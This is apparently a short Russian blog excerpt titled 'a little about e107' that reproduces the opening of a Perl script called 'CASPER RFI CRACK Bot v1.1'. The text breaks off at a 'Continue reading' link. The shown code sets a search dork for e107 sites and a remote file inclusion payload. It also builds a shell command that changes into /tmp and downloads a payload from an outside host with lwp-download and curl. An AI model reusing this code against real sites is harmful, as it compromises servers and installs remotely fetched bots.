Немного о e107

#!/usr/bin/perl my $aboutbot=’ ################################ #  CASPER RFI CRACK Bot v1.1   # #  By Kiss_Me Alert jan 2010.  # #     Casper_kae@yahoo.com     # ################################ ‘; print($aboutbot); use strict; use Socket; use IO::Select; use IO::Socket::INET; use LWP::UserAgent; use HTTP::Request::Common qw(POST); my $dork  = “e107”; my $e107sprd = “include(‘http://lshungary.hu/casper/casper.txt?’)”; my $e107cmdsp= “‘cd /var/tmp;cd /tmp;lwp-download http://lshungary.hu/casper/iso.txt -O iso.txt;curl -O http://lshungary.hu/casper/iso.txt… Continue reading Немного о e107